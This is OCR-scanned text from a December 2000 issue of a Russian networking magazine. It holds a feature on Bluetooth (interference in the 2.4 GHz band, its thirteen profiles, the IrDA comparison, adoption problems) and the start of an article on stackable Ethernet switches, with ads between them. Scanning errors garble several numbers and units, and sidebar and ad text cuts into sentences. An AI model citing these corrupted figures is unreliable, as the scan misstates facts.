Дальность передачи Bluetooth, а
следовательно, размер самой пикосети
не превышает ю м. Это расстояние пла-
нируется увеличить до too м, однако
только немногие производители рабо-
тают над этим, поскольку чем меньше
расстояние, тем больше экономия энер-
гии и меньше помехи. Это важно, так
как Bluetooth функционирует в «пере-
населенном» диапазоне частот 2,4 ГГц
зарезервированном для исследования в
промышленности, науке и медицине
(Industrial, Scientific, Medical, ISM),
который, в действительности, вовсе не
предназначался для передачи данных.
Теоретически частоту 2,4 ГГц можно
использовать без лицензии в любой
точке земного шара.
Микроволновые печи и другие на-
гревательные приборы должны рабо-
тать с частотой приблизительно в
2450 МГц, резонансной частотой воды,
поэтому диапазон плюс-минус 50 МГц
относительно этого значения нельзя
занимать. Однако в условиях, когда
спектр является очень дефицитным
ресурсом, многие правительства ли-
цензируют частоты и из этого диапа-
зона, отщипывая от него но кусочку
для всяких других целей.
Для того чтобы Bluetooth могла ра-
ботать по всему миру, в большинстве
стран было принято решение внести
изменения в планы лицензирования,
чтобы можно было использовать час-
тоты от 2400 до 2483,5 МГц. Исключе-
ния составляют Франция и Испания —
здесь разрешенная полоса частот на-
много уже. Bluetooth сможет работать
и в этих странах, но применение уст-
42 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
ройств на базе данной технологии бу-
дет незаконным, поскольку они спо-
собны заблокировать работу лицензи-
онных систем.
Отрасль разработала специальную
версию Bluetooth, где используется
более узкая полоса частот, с тем, что-
бы жители Франций и Испании не
чувствовали себя обделенными чуде-
сами современной технологии. С дру-
гой стороны, la dent bleue может ока-
заться несовместимым с мировым
стандартом, что чревато проблемами
для европейцев, которые уже привык-
ли к тому, что их телефоны работают
на всем континенте.
УКРАЛИ ПОЛОСУ ЧАСТОТ!
Bluetooth может создать затруднения
для других технологий даже в том слу-
чае, когда она не вторгается в лицензи-
руемый спектр. Э го не первая система,
создатели которой ради избавления от
необходимости получать разрешение
на право занимать тс или иные частоты
используют диапазон ISM, и этот
спектр «забит до отказа». В диапазоне
ISM работают некоторые беспровод-
ные телефоны, местные системы ра-
диосвязи и, что особенно важно для со-
здателей вычислительных сетей, бес-
проводные локальные сети.
Любая система, использующая этот
диапазон, становится жертвой помех от
излучения медицинских сканеров, на-
гревательных приборов и тому подоб-
ных устройств. Bluetooth изначально
рассчитана на максимальную сопроти-
вляемость помехам, поскольку предпо-
лагается, что она должна работать вез-
де. В отличие от беспроводных локаль-
ных сетей, которые, как правило, уста-
навливаются в относительно «чистых»
помещениях, микросхемы Bluetooth
могут подвергаться непосредственному
воздействию таких источников излуче-
ния, как микроволновые печи.
«Bluetooth относится к тому, что при-
нято называть «грубым радио», - пояс-
няет Аарон Беннет, вице-президент по
маркетингу производителя беспровод-
ных локальных сетей Breezecom. Эта
технология не проверяет, использует
ли уже кто-либо те частоты, на которых
она должна работать, она просто начи-
нает вещание, и все».
Как ни странно, энтузиасты
Bluetooth соглашаются с этим. «Начи-
ная работу, устройство Bluetooth не
«интересуется», работает ли кто-нибудь
еще па его частоте, — признает Валенти-
но из компании Alcatel. Оно как бы
заполняет спектр густым туманом».
Подобно многим беспроводным си-
стемам, Bluetooth основана па методе
скачкообразного переключения часто-
ты. В полном соответствии с названи-
ем, данный метод ЦрЬдполагает быст-
рую смену частот. Он опирается на
идею, что в случае помех на одной час-
тоте другая будет свободна. В техноло-
гии Bluetooth диапазон ISM делится
на 79 каналов, а переключение с одно-
го канала на другой осуществляется по
псевдослучайной схеме 1600 раз в се-
кунду. Это исключительно высокая
скорость по сравнению с другими сис-
темами, где применяется метод скачко-
3 PARTNER Г
Д I'Kf.Mirit 1 ГИ11ПГО [
Высокоскоростной доступ в Интернет по выделенным линиям
I'M Телекам ЛицгяЗви № 13113, rtlW
ч. Полный комплекс услуг сети Интернет
ч_ Срок подключения от 14 дней
111 II
Скорость подключения от 64 Кбит/сек до ЮМбит/сек
< Минимальная месячная плата - 50 у.е.
< Специальные скидки для жилых домов
< Круглосуточное техническое обслуживание
< Бесплатное техническое обследование
e-mail: lnto@rmt.ru; http://www.rmt.ru; тел. факс:;(095) 333-.0322. 333-0422
> http://www.lanmag.ru
Декабрь 2000 43
> ТЕМА НОМЕРА:
Счастливое число 13
Прикладной уровень Bluetooth состоит из де-
вяти независимых стандартов Все они на-
зываются профилями и включают в себя прото-
колы и программы, необходимые для конкрет-
ного приложения. Далеко не каждое устройство
на базе технологии Bluetooth будет поддержи-
вать все девять профилей, некоторые могут
поддерживать только один.
Эта система не раз подвергалась критике за
чрезмерную сложность, поскольку будущие вер-
сии технологии потребуют новых профилей для
поддержки новых приложений, но специалисты
Bluetooth Special Interest Group (SIG) утвержда-
ют, что четко определенные стандарты необхо-
димы для обеспечения совместимости. Профи-
ли создаются по модульному принципу, т. е.
многие из них могут повторно задействовать
один и тот же код. По этой причине существует
еще четыре дополнительных профиля, которые
не соответствуют никакому определенному при-
ложению. а используются другими в качестве
строительных блоков. В приведенном ниже спи-
ске они обозначены номерами 1. 2, 5 и 10.
1. Generic Access Profile. Это основной про-
филь Bluetooth, отвечающий за поддержание
связи между устройствами, выявление других
доступных профилей, а также за безопасность.
Этот профиль должен быть включен во все уст-
ройства Bluetooth, однако сам по себе он недо-
статочен ни для одного полезного приложения.
В него входят функции, необходимые для рабо-
ты всех основных протоколов Bluetooth.
2. Service Discovery Application Profile дает
пользователю возможность непосредственно
обращаться к Service Discovery Protocol (SDP)
для того, чтобы определять, какие сервисы
Bluetooth доступны при работе с данным уст-
ройством. SDP входит в число основных прото-
колов, однако без этого дополнительного про-
филя доступ к нему открыт только для прило-
жений. но не для пользователей.
3. Cordless Telephony Profile предназначен для
устройств, называемых в терминологии SIG те-
лефонами «три в одном», г. е. для сотовых те-
лефонов с микросхемой Bluetooth, позволяю-
щей использовать телефон в качестве беспро-
водной «трубки». Через точку доступа Bluetooth
он подсоединяется к телефонной сети в доме,
офисе и даже в общественных местах, таких,
как залы ожидания в аэропортах, снижая тра-
фик сотовой связи и обеспечивая тем самым
образного переключения частот, н эта
быстрота обеспечивает Bluetooth ре-
ши ющеё прей му щество.
В системах с нёретслючениём час-
тот любое переключение па частоту.
определенную экономию. Он работает поверх
протокола Telephony Control Service (TCS).
4. Intercom Profile. Этот профиль, также бази-
рующийся на протоколе TCS, обеспечивает дву-
стороннюю голосовую связь между устройства-
ми Bluetooth. Он проще предыдущего профиля,
так как рассчитан на прямое взаимодействие
двух устройств, расположенных в зоне взаим-
ной досягаемости, а не на звонки, требующие
маршрутизации по телефонной сети общего
пользования или Internet.
5. Serial Port Profile позволяет устройствам
Bluetooth эмулировать последовательный порт
ПК при помощи протокола RFComm Он обеспе-
чивает эмуляцию интерфейса RS-232 либо бо-
лее нового интерфейса USB и используется
многими профилями более высокого уровня.
6. Headset Profile определяет способ, посред-
ством которого Bluetooth обеспечивает беспро-
водное соединение устройства с гарнитурой,
оснащенной динамиками и, возможно, микро-
фоном. Так как этот профиль рассчитан не
только на поддержку связи с мобильными теле-
фонами, но и с ПК, МРЗ-плейерами и другими
устройствами, он остается единственным до
сих пор профилем, где используются команды
АТ, первоначально разработанные для управле-
ния модемами.
7. Dial-up Networking Profile предназначен
для компьютеров, связывающихся с Internet
через сотовый телефон. Сейчас для этого тре-
буется специальный кабель или IrDA, но в бу-
дущем подобные функции станет предоста-
влять Bluetooth. Dial-up Networking Profile
включает в себя профиль последовательного
порта и протокол РРР, используемый стан-
дартными модемами для передачи IP по теле-
фонной линии.
8. Fax Profile. Этот профиль во многом похож
на предыдущий. Он позволяет мобильному те-
лефону эмулировать факс-модем при соедине-
нии через Bluetooth с ноутбуком, имеющим
программное обеспечение поддержки факса.
Подобно предыдущему протоколу, он использу-
ет РРР и профиль последовательного порта.
9. LAN Access Profile предназначен для созда-
ния IP-сетей и позволяет создавать небольшие
беспроводные сети Intranet, объединяющие ПК
или интеллектуальные телефоны. Он также ис-
пользуется точками доступа для связи с кабель-
ными сетями, будь то локальные сети или
где имеются помехи, приводит к поте-
ре передаваемого в это время пакета.
Это означает, что, если один из 79 ка-
налов Bluetooth занят другой техно-
логией или другой пмкосетыо
Internet. Хотя большинство точек доступа будет
базироваться на Ethernet, все они действуют как
IP-маршрутизаторы, так что теоретически они
могут использовать и другие стандарты второго
уровня, например Token Ring или SONET. По
мнению большинства экспертов, этот профиль
станет наиболее полезным из числа профилей
Bluetooth и будет применяться в устройствах,
поддерживающих передачу голоса поверх IP и
доступ в Internet.
10. Generic Object Exchange Profile определяет,
каким образом Bluetooth использует Object
Exchange (OBEX), клиент-серверный протокол,
заимствованный у IrDA. Он позволяет приложе-
ниям обмениваться данными непосредственно,
без использования IP, и формирует основу
профилей 11,12 и 13.
11. Object Push Profile управляет обменом
электронными визитками в формате vCard,
многим пользователям ПК и Palm он знаком
как формат файлов *.vcf Эти визитки содер-
жат ту же информацию, что и традиционные, но
при этом они могут быть автоматически занесе-
ны в Personal Information Manager (PIM) или в
базу данных. Слово «push» («толкать») в назва-
нии профиля подчеркивает то, что пользова-
тель должен в явном виде разрешить предоста-
вление информации. Это делается для защиты
конфиденциальности. Электронные визитки,
как правило, не передаются всем устройствам в
пределах досягаемости. Два пользователя, ко-
нечно, могут договориться о принятии или от-
клонении данной операции.
12. File Transfer Profile позволяет устройству
получать доступ к данным, хранящимся на дру-
гом устройстве, аналогично тому, как это дела-
ется в ftp. Помимо связывания двух устройств
друг с другом приложения этого профиля мо-
гут выполнять сканирование или печать.
13. Synchronization Profile обеспечивает син-
хронизацию данных, хранящихся на различных
устройствах. Синхронизация может быть авто-
матизирована, так что компьютер будет автома-
тически синхронизировать данные с мобиль-
ным телефоном или устройством PDA. когда те
находятся в пределах его зоны действия. Боль-
шинство устройств, пользующихся этим профи-
лем, будут использовать SyncML, язык размет-
ки. разработанный для передачи данных между
не совместимыми иным способом устройства-
ми PIM и органайзерами.
Bluetooth, каждый 79.-й пакет будет
теряться. Однако если устройство на
базе другой технологии будет сменять
частоты лишь 50 раз в секунду, то сиг-
налы Bluetooth будут накладываться
44 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
на передаваемую этим устройством
информацию при каждом его пере-
ключении, следовательно, это устрой-
ство будет терять каждый пакет.
Популярный стандарт на беспро-
водные локальные сети IEEE 802.11b
вовсе не предполагает переключении,
он поддерживает передачу данных па
нескольких частотах одновременно, в
расчете, что хотя бы одна копия дой-
дет до пункта назначения (см. статью
«А кабели где?» в этом номере LAN).
Поэтому устойчивость 802.11b к поме-
хам, создаваемым Bluetooth, несколь-
ко выше, чем у систем с низкой скоро-
стью переключения, однако близость
работающей микросхемы Bluetooth
все же отрицательно сказывается на
производительности приемопередат-
чика 802.11b. Это происходит потому,
что 8o2.ul> проектировалась в расчете
на большие расстояния и большую
скорость связи, чем Bluetooth. Произ-
водители постоянно подчеркивают,
что эти технологии не конкурируют
друг с другом (за исключением физи-
ческого уровня), имея в виду ноутбу-
ки, поддерживающие обе технологии.
Тестирование, проведенное произ-
водителем беспроводных систем
Mobilian, показало, что скорость рабо-
ты систем, поддерживающих протокол
802.11b, при соседстве с Bluetooth все-
гда снижалась, кроме тех случаев, ко-
гда два приемопередатчика 802.11 рас-
полагались очень близко друг к другу,
в пределах 3 м. Только на этом рассто-
янии их сигналы были достаточно
сильны, чтобы не подвергаться воздей-
ствию Bluetooth. Учитывая, что систе-
мы на базе протокола 802.11 рассчита-
ны на расстояние между устройствами
порядка юо м, становится очевидным,
что Bluetooth будет затруднять их ра-
боту (см. Рисунок 2). По информации
Mobilian, помехи работе беспровод-
ных сетей со стороны Bluetooth уже
привели к тому, что в некоторых ком-
паниях ввели правила, запрещающие
эту технологию. Сегодня такие прави-
ла соблюдать нетрудно, поэта практи-
ка станет невозможной, если распро-
странение Bluetooth достигнет мас-
штабов, намеченных SIG.
Компания Mobilian предложила
решение. получившее название
TrueRadio, с интегрированной под-
держкой Bluetooth и 8o2.ii на одной
микросхеме. По утверждению предста-
вителей компании, эта технология ко-
ординирует работу передатчиков, сво-
дя к минимуму помехи и позволяя обе-
им системам работать в полную силу.
Некоторые компании пытаются пред-
ложить аналогичные решения, сочета-
ющие Bluetooth с прочими вариантами
8o2.ii и HomcRF. Однако на дефицит-
ный спектр 1SM претендует еще один
стандарт.
КРАСНЫЙ СВЕТ ДАННЫМ
Конкуренция за спектр — не единст-
венная трудность, с которой Bluetooth
придется иметь дело. Ее также пресле-
дует призрак технологии IrDA
(Infrared Data Association), предшест-
венницы Bluetooth, пытавшейся осво-
ить тот же сектор рынка. 11 в самом де-
ле, если вспомнить о шумихе, которая
сегодня сопровождает все беспровод-
ные и оптические системы, кажется
удивительным, почему беспроводная
оп тическая система, встроенная почти
в каждый ноутбук, остается практиче-
ски без внимания.
«Большинство портов IrDA в ноут-
буках не используется, сетует Дэвид
Хофакер, менеджер по вопросам мо-
бильной связи в Северно-Американ-
ском регионе компании Extended
Systems, принимавший участие в раз-
работке стека протоколов для
Bluetooth и IrDA. — Порты установле-
ны во многих устройствах, что дает
производителям право заявлять в рек-
ламных объявлениях о поддержке «ин-
фракрасной» связи, не упоминая, од-
нако, об отсутствии необходимых
драйверов».
Что случилось с этой технологией?
Большинство сторонников Bluetooth
убеждены, что IrDA имеет неустрани-
мые недостатки, так как она базирует-
ся на довольно туманных рекоменда-
циях. а не на четких стандартах. Дос-
тичь совместимости было так трудно,
что многие производители просто ос-
тавили свои попы тки. Это, в свою оче-
редь, подорвало доверие пользовате-
лей, которые даже в тех случаях, когда
эта технология действительно работа-
ет, продолжают счи тать, что она не ра-
ботает. Единственным способом про-
верить. поддерживает ли ноутбук
IrDA. является малоприятный метод
проб и ошибок.
UPSNeuHaus
Источники бесперебойного питания
On-Line с двойным преобразованием
POWER SYSTEM 18...120 KVAJ
INTEGRA f4-1П KVAJ
P0WHH1NE11J KVA1
ШИМ-инвертор ни ЮВьтранэисторах
Микропроцессорное управление
(2 процессора Into!)
Выходной изолирующий трансформатор
Рекордно молью габариты и пес
(120 KVA - 750 кг. 80 KVA - 555 кг)
Сверхвысокая порегрузочнан
способность (200% -1 мин.)
Высокая надежность (MTBF • 17 лот)
Программное обеспечение Power Shield
ШИМ-инвертор на IGBT-трзмзисторах
Выходной изолирующим трансформатор
Алфавитно-цифровой ЖК-дисплеи
Модели с 1-фозным и 3-фаэным входом
Дополнительные батарейные блоки
с зарядными устройствами
Программное обеспечение UPSHion-2000
в комплекте
Стабильное синусоидальное напряжение
на выходе
Автоматический Bypass
ЖК-дисплей на породной панели
Индикации параметрон электросети
и состояния UPS
’Холодный” старт
До в часов автономной работы
Программное обеспечение UPSillon-2000
о комплекте
NeuHaus Group
Малая Калужская, 15
(095) 956-01-11. 955-92-62
www.neuhaus.ru
> http://www.lanmag.ru
Декабрь 2000 45
> ТЕМА НОМЕРА:
Приложения
t
Обмен объектами (ОВЕХ)
(просгой клиент-серверный протокол, заимствованный у IrDA)
Команды АТ
(для управления телефоном
или модемом)
RFCOMM Служба управления телефонией (Telephony Control Service. TCS)
(для эмуляции последовательного порта) (для передачи Голоса не поверх IP)
Протокол обнаружения услуг (Service Discovery Protocol. SOP)
(производит сканирование в поисках других устройств, затем предоставляет информацию
о поддерживаемых профилях и приложениях)
Протокол управления логическими каналами и адаптацией (Logical Link Control and Adaptation Protocol, L2CAP)
(обеспечивает мультиплексирование различных типов трафика и QoS)
Протокол менеджера канала (Link Manager Protocol. LMP)
(поддерживает аутентификацию и шифрование)
I
Узкополосная передача (Baseband)
(синхронный протокол коммутации каналов с установлением соединений (SCO)
или асинхронный протокол коммутации пакетов без установления соединении (ACL))
Радио (на основе скачкообразного переключении частот IEEE 802.11)
Другие протоколы
Необязательные протоколы
Bluetooth
Базовые протоколы Bluetooth
Источник; Mobilian
Рисунок 3. Стек Bluetooth представляет собой базовый набор протоколов первого и второго уровней,
наряду с несколькими необязательными протоколами второго уровня, которые реализуются только
для определенных приложений. Поддержка других протоколов на третьем уровне, приведенных на ри-
сунке, не является прерогативой Bluetooth.
«Работая над Bluetooth, мы учли
ошибки IrDA, - подчеркивает Хофа-
кер, — и уверены, что нс наступим па те
же грабли». В то время как создатели
IrDA специфицировали только физи-
ческий уровень в надежде, что разра-
ботчики приложений доделают все не-
обходимое, чтобы эта технология зара-
ботала, стандарт Bluetooth строго оп-
ределяет и уровень приложений. Стек
протоколов Bluetooth позаимствовал
немало проверенных механизмов у
других протоколов, в том числе у IP и,
как ни странно, IrDA (см. Рисунок 3).
Разработчики имеют право утвер-
ждать, что их устройство соответству-
ет стандартам Bluetooth только в том
случае, если оно поддерживает пять ос-
Протоколы Internet
1
IP
I
PPP Протоколы телефонии
—1 t
новных протоколов этой технологии, а
также если устройство продемонстри-
ровало свою работоспособность по
крайней мере для одного приложения.
Поддержка приложений в Bluetooth
определяется стандартами, называе-
мыми профилями, каждый из которых
отвечает за выполнение конкретной
функции. (Описание профилей приве-
дено во врезке «Счастливое число 13».)
Так. например, девятый профиль опре-
деляет. как в Bluetooth осуществляет-
ся передача трафика IP. Прежде чем
производитель заявит о поддержке
данной возможности, он должен са-
мым доскональным образом протести-
ровать взаимодействие своего устрой-
ства с продуктами других производи-
телей, поддерживающих этот профиль.
Только после того, как все тесты на со-
вместимость пройдены, производите-
лю разрешается использовать логотип
Bluetooth.
Тестирование производится па ре-
гулярной встрече производителей
Unplugfest, во время которой конкури-
рующие друг с другом компании забы-
вают о разногласиях и совместными
усилиями пытаются заставить рабо-
тать опытные образцы своих уст-
ройств. «Мы отгораживаемся от внеш-
него мира и в течение недели тестиру-
ем наши устройства, — говорит Хофа-
кер. Это по-настоящему захватыва-
ет». Результаты тестирования совмест-
ной работы конкретных устройств хра-
нятся в строжайшей тайне, однако не
секрет, что проблемы совместимости
сдерживают развитие этой отрасли.
По прогнозам аналитика компании
Forrester Research Шрека, совмести-
мость останется бичом отрасли и в обо-
зримом будущем. «Сотовые телефоны
Nokia по-прежнему только пытаются
заговорить с Compaq Pocket PC, не-
смотря даже на превосходную работу
беспроводного соединения». Возмож-
но, они слышат друг друга, но говорят
все еще на разных языках.
Разумеется, члены S1G придержи-
ваются на сей счет более оптимистиче-
ских взглядов. «Популяризацией
Bluetooth занимаются компании» ори-
ентирующиеся на потребителя, уве-
рен Хофакер, - а эти люди обладают
немалым опытом производства про-
дукции, главное свойство которой -
простота применения». Именно по
этой причине прогресс Bluetooth вовсе
не так стремителен, как поначалу наде-
ялись ее создатели: производители не
хотят приступать к созданию чего-то
нового, пока не убедятся, что оно дей-
ствительно может работать.
По иронии судьбы, Bluetooth может
способствовать превращению IrDA в
своего серьезного конкурента.
«Bluetooth возбудила интерес к бес-
проводным технологиям малого ради-
уса действия, говорит Хофакер, — а
IrDA всегда была дешевой и быстрой
технологией». В то время как
Bluetooth только движется по направ-
лению к рубежу в несколько долларов,
инфракрасные приемопередатчики
уже стоят всего несколько центов.
46 LAN/Журнал сетевых решений
> ТЕМА НОМЕРА:
Информационная
революция в России
13-16 марта
Дополнительная информация
в Интернет:
http://www.rif.ru
и по телефонам в Москве:
(095) 332-4852, 129-1533
Впрочем, если усилия по достижению совместимости, на-
правленные на совершенствование Bluetooth, косвенным
образом приведут к развитию инфракрасной связи, потре-
бители только выиграют от этого.
Сейчас IrDA поддерживает различные скорости переда-
чи данных от 115 Кбит/с до 16 Мбит/с, хотя, как уже говори-
лось, определить действительную скорость конкретного
устройства можно только методом проб и ошибок. Впрочем,
представители Infrared Data Association уверены, что ско-
рость можно довести до 50 Мбит/с. Если это действительно
будет сделано, IrDA получит преимущество перед Bluetooth
в тех случаях, когда требуется передавать файлы большого
размера: например, при выгрузке фотографий из цифрового
фотоаппарата, загрузке музыки в MP3-плейер или — что
уже ближе к серьезным бизнес-задачам — при распечатке
дл и 11 н ых документов.
ГОЛУБЫЕ КРИСТАЛЛЫ
Появление Bluetooth сдерживают не только проблемы сов-
местимости. Создание приемопередатчика в виде одной ми-
кросхемы — трудная задача, а обеспечение массового произ-
водства такого кристалла по приемлемой цене еще труд-
нее. И хотя сейчас едва ли не все производители заявляют о
своей приверженности Bluetooth, так было далеко не всегда.
Microsoft присоединилась к Bluetooth SIG очень поздно
и еще не реализовала поддержку этой технологи и ни в од-
ной из своих операционных систем. Ни одна существующая
версия Windows не работает с Bluetooth, и, по заявлениям
Microsoft, корпорация не планирует включать поддержку в
будущие сервисные пакеты для Windows 2000 или
Windows Me. Первой настольной операционной системой,
в которую будет встроена Bluetooth, станет Whistler — сис-
тема, ориентированная как на бизнес-пользователей, гак и
на потребителей (она должна появиться под названием
Windows 2002).
«Осуществить это гораздо труднее, чем поначалу каза-
лось представителям отрасли», — признает Валентино из
компании Alcatel. Тем не менее он убежден, что все трудно-
сти будут преодолены. Массовые поставки продуктов, под-
держивающих Bluetooth, начнутся в следующем году, хотя
прогнозы SIG о выпуске юо млн устройств к концу 2001 г.,
выглядят неправдоподобными. Единственные продукты,
выпускаемые уже сейчас, - это модули расширения, такие,
как CF+ или карты PCMCIA, однако обеспечить их встраи-
вание в ноутбуки или PDA - дело полугода.
Когда столько производителей сделали ставку на
Bluetooth, она просто не имеет права на провал. Если это
случится, отрасли беспроводной связи придется пережить
разочарование, по глубине сравнимое разве что с крахом
Iridium. Возможно, Bluetooth не вызовет революционных
изменений во всем образе жизни людей, как утверждают ее
сторонники, по опа вполне может стать полезной сетевой
технологией. LAN
Энди Дориан — старший редактор Network Magazine, ав-
тор книги «Путеводитель по беспроводной связи» («The
Essential Guide to Wireless Communications»). С ним мож-
но связаться no адресу: adornan@cmp.com.
48 LAN/Журнал сетевых решений
>КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Сравнительный анализ
используемых технологий
для объединения
КОММу I 31 ОрОВ В СТ6К. Александр Гусак
Технологии стековых
коммутаторов
Иллюстрация Александра Щербакова
С тековые коммутаторы являются се-
годня одним из самых популярных
классов продуктов на рынке сете-
вой интеграции. Подобные устройства
предлагаются всеми ведущими произво-
дителями активного оборудования для
локальных сетей. Однако разработчики
этих устройств используют весьма раз-
личные технологии, что заметно влияет
на эффективность внедрения того или
иного решения. Особое значение дан-
ный факт приобретает в связи с тем, что
стоимость разных решений в рассматри-
ваемом сегменте различается незначи-
тельно. В предлагаемом обзоре описы-
ваются наиболее распространенные
подходы и технические приемы, исполь-
зуемые при создании стековых комму-
таторов, а также анализируются их дос-
тоинства и недостатки. Надеемся, что
этот материал будет полезен широкому
кругу читателей при выборе оборудова-
ния для модернизации сети.
Идея наращивания емкости актив-
ного оборудования локальной сети пу-
тем объединения нескольких автоном-
ных устройств в одно логическое из-
вестна достаточно давно. Еще в те вре-
мена, когда термина «коммутатор ло-
кальной сети» просто не существовало,
и большинство корпоративных сетей
строились на базе концентраторов,
многие модели последних позволяли
объединить через специальный порт
несколько устройств в «этажерку»
(стек). Соединение сегментов несколь-
ких устройств дает возможность ре-
шить целый ряд задач:
1. увеличить количество подключен-
ных рабочих мест, не опасаясь столк-
нуться с ограничением технологии
Ethernet на число повторителей ме-
жду двумя устройствами;
2. обеспечить более равномерное рас-
пределение пропускной способности
сети между рабочими местами по
сравнению с каскадной схемой под-
ключения;
3. уменьшить количество магистраль-
ных отводов в системе (поскольку
стеку требуется только одна линия
для подключения к магистрали вме-
сто отдельной для каждого автоном-
ного устройства);
4. упростить управление оборудовани-
ем благодаря наличию одного обше-
> http://www.lanmag.ru
Декабрь 2000 49
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
Рисунок 1. Стек коммутаторов Cajun Р11О компании Avaya Communication с соединением по
шине Exoplane.
го адреса для всего стека (и умень-
шить число адресов, используемых
оборудованием локальной сета).
Вместе с тем, количество портов
(работающих устройств) в одном сег-
менте (домене коллизий) внутри стека
концентраторов не должно превышать
определенной величины. Задолго до
достижения теоретического предела
toBaseT учащающиеся коллизии дела-
ют невозможным создание стека с бо-
лее чем несколькими десятками актив-
но используемых портов.
ПРОБЛЕМА КОММУТАЦИИ
Первые коммутаторы долгое время вы-
пускались только в двух вариантах ис-
полнения — небольшие автономные
устройства с относительно малым чис-
лом портов (обычно до 24) и мощные
модульные коммутаторы па базе шас-
си, позволяющие устанавливать моду-
ли с различными типами и количест-
вом интерфейсов.
Автономные, сравнительно недоро-
гие устройства не обладали требуемой
гибкостью с точки зрения масштабиро-
вания. При необходимости емкость си-
стем увеличивалась путем соединения
нескольких устройств через пользова-
тельские порты. Такой способ не обес-
печивает нужной производительности
и предполагает напрасную трату полез-
ных интерфейсов.
Модульные коммутаторы позволя-
ют постепенно, по мере необходимости,
наращивать емкость до нескольких со-
тен портов. Но из-за сложности реали-
зации высокоскоростной внутренней
шины, необходимой для эффективной
коммутации большого числа сегмен-
тов, на начальном этапе стоимость шас-
си и решения в целом оказывается
чрезмерно высокой. В результате те,
кто отвечал за выбор стратегии созда-
ния и развития корпоративной сети,
оказывались перед сложной дилеммой.
С одной стороны, они могли сразу вло-
жить значительные средства в аппарат-
ную часть с риском потратить деньги
понапрасну, если развитие системы
пойдет медленнее, чем планировалось
изначально. Другой вариант — сэконо-
мить на начальном этапе, с риском в
дальнейшем столкнуться с необходи-
мостью заменить оборудование из-за
его неспособности справиться с новы-
ми задачами.
Проблему можно было бы решить,
применяя коммутаторы, сравнимые по
цене и характеристикам с автономны-
ми. но позволяющие организовать сте-
ки и создавать системы, близкие ио
плот пости портов, производительнос ти
и надежности к возможностям модуль-
ных устройств.
Однако соединить в стек коммута-
торы гораздо сложнее, чем концентра-
торы. В среде из концентраторов в ка-
ждый момент времени может переда-
ваться только один поток данных. Та-
ким образом, для соединения в стек
концентраторов пропускной способ-
ности в то или юо Мбит/с вполне дос-
таточно вне зависимости от числа за-
действованных устройств. Система
коммутации, по определению, должна
обеспечивать одновременную переда-
чу данных между любыми парами пор-
тов с выделением каждому потоку
всей необходимо)”! пропускной способ-
ности. Для полноценного параллель-
ного взаимодействия всех или боль-
шинства портов системы объединяю-
щая шина должна поддерживать го-
раздо большую пропускную способ-
ность. чем производительность каждо-
го ав тономного устройства в стеке. На
практике пропускная способность
стековых соединений редко бывает
равна сумме скоростей всех портов
(так называемая «неблокирующая»
архитектура, характерная для модуль-
ных коммутаторов), ио полноценное
решение обязано обеспечивать доста-
точный запас производительности для
трафика между модулями.
Кроме того, в «идеальном» стеко-
вом коммутаторе дополнительные
функциональные возможности долж-
ны быть реализованы для всех уст-
ройств независимо от того, подключе-
ны они к одному элементу стека или к
разным. Эти дополнительные возмож-
ности предполагают создание транко-
вых соединений (объединение не-
скольких физических портов в один
логический канал для суммирования
пропускной способности и повышения
надежности), отображение графика с
любого порта на заданный (к которому
может быть подключен сетевой анали-
затор) и многое другое. Таким обра-
зом, по внутристековым соединениям
должны передаваться не только основ-
ные данные, по и дополнительная уп-
равляющая информация.
Поддержка технологии виртуаль-
ных локальных сетей (Virtual LAN,
VLAN) является уже практически обя-
зательной для современных коммута-
торов. Стековые коммутаторы должны
50 LAN/Журнал сетевых решений
> КОРПОРАТИВНЫЕ СЕТИ: СТЕКОВЫЕ КОММУТАТОРЫ
обеспечивать выделение в отдельную
виртуальную сеть группы портов неза-
висимо от их положения в стеке. Одна-
ко зачастую устройствам, входящим в
разные VLAN, требуется взаимодейст-
вовать между собой, например, выде-
ленным в отдельную виртуальную сеть
серверам с рабочими станциями.
Обычно это делается при помощи
внешнего маршрутизатора или комму-
татора третьего уровня (маршрутизи-
рующего коммутатора). Но во многих
случаях из-за наличия большого числа
портов в стеке и значительного межсе-
тевого трафика пакеты требуется мар-
шрутизировать непосредственно внут-
ри стека. Эта возможность необходима,
когда приходится поддерживать связь
между устройствами, находящимися в
различных подсетях IP.
Наконец, для обеспечения беспере-
бойной работы системы, обслуживаю-
щей большое число пользователей и
серверов, стек должен предусматри-
вать дополнительные средства повы-
шения надежности, как минимум воз-
можность замены или отключения от-
дельных элементов стека без прерыва-
ния его работы. Не менее важно исклю-
чить потенциальные «слабые звенья»,
выход из строя или отключение кото-
рых может привести к неработоспособ-
ности стека в целом. Кроме того, в сте-
ке желательно предусмотреть средства
для повышения физической надежно-
сти, такие, как резервные источники
питания.
Воплощение подобной системы
сложная задача, поэтому в первые годы
существования коммутаторов возмож-
ность их объединения в стеки не была
реализована. Термин «стек» в торговых
марках многих устройств (например,
HP AdvanceStack, 5С01П SuperStack,
Cabletron SmartStack) означал всего
лишь исполнение устройств в сходных
конструктивах и физических габари-
тах, т. е. возможность удобно поставить
их друг на друга, связав обычным кас-
кадным соединением.
ТЕХНОЛОГИЧЕСКИЙ ПРОРЫВ
В 1996 г. компания Madge первой ус-
пешно преодолела многие из перечис-
ленных проблем. Семейство коммута-
торов Madge Visage, после приобрете-
ния в 1998 г. одним из лидеров рынка,
компанией Lucent Technologies, а за-
941-3431, 941-4000
E-mail: info@conti.ru
http: //www.contl.ru
СЕРДЕЧНО ПОЗДРАВЛЯЕМ
ВСЕХ НАШИХ ДРУЗЕЙ
И ПАРТНЕРОВ
С НОВЫМ ГОДОМ И РОЖДЕСТВОМ!
ЖДЕМ ВАС УНГМ
НА НОВОМ САЙТЕ*.1\**г
www.conti.ru,
ГДЕ ВЫ УЗНАЕТЕ НЕ ТОЛЬКО
ЧТО МЫ МОЖЕМ ВАМ ПРЕДЛОЖИТЬ,
НО И ДЛЯ ЧЕГО ЗТО МОЖЕТ ВАМ ПОНАДОБИТЬСЯ
тем выделения подразделения корпо-
ративных сетей в компанию Avaya
Communication, предлагалось под
торговой маркой Cajun Р110 и до сих
пор остается одним из наиболее совер-
шенных в техническом плане. Семей-
ство Cajun Рио включает 12 коммута-
торов различной фиксированной кон-
фигурации. имеющих от 8 до 24 ком-
мутируемых интерфейсов Ethernet
или Fast Ethernet. Многие из них ос-
нащены дополнительными магист-
ральными интерфейсами, в числе ко-
